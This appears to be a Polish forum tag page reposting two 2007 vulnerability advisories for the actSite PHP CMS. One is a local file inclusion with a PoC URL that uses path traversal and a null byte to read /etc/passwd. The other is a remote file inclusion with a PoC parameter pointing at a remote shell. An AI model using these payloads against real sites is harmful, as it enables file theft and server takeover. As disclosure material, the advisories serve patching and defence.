Forum Brzeg on
Regulamin Kalendarz Szukaj Album Rejestracja Zaloguj

MegaExpert
Strona Główna » Tagi » luka
Podobne tagi tematów
luka

Tematy oznaczone jako luka
Tytuł / treść wątku  Wyświetleń  Odpowiedzi 

Luka w: actSite 1.56 (news.php) Local File Inclusion Vulner


:: #'#/

(-.-)

-----------------oOO---(_)---OOo-----------------

| actSite v1.56 (news.php) Local File Inclusion |

| coded by DNX |

-------------------------------------------------

[!] Discovered: DNX

[!] Vendor: http://www.actsite.de

[!] Detected: 02.09.2007

[!] Reported: 02.09.2007

[!] Remote: yes



[!] Background: actSite is a content management system based on PHP and MySQL



[!] Bug: in phpinc/news.php line 101



require PHP_INCLUDE_PATH."/inc/news/news_$_POST[do].php";



[!] PoC:

- http://[site]/[path]/phpinc/news.php?do=/../../../../../../../etc/passwd%00



[!] Description:

- So why we can inject code in a post variable per url? Let's do some research...
...
7975 0

Luka w: actSite 1.991 Beta (base.php) Remote File Inclusion


:: #'#/

(-.-)

---------------------oOO---(_)---OOo--------------------

| actSite v1.991 Beta (base.php) Remote File Inclusion |

| coded by DNX |

--------------------------------------------------------

[!] Discovered: DNX

[!] Vendor: http://www.actsite.de

[!] Detected: 02.09.2007

[!] Reported: 02.09.2007

[!] Remote: yes



[!] Background: actSite is a content management system based on PHP and MySQL



[!] Bug: $BaseCfg[BaseDir] in lib/base.php



[!] PoC:

- http://[site]/[path]/lib/base.php?BaseCfg[BaseDir]=[shell]



[!] Solution: Install update to v1.995 ::
5053 0


Powered by phpBB modified by Przemo © 2003 phpBB Group
Template BMan1Blue v 0.6 modified by Nasedo
Strona wygenerowana w 0,03 sekundy. Zapytań do SQL: 14
Nasze Serwisy:









Informator Miejski:

  • Katalog Firm w Brzegu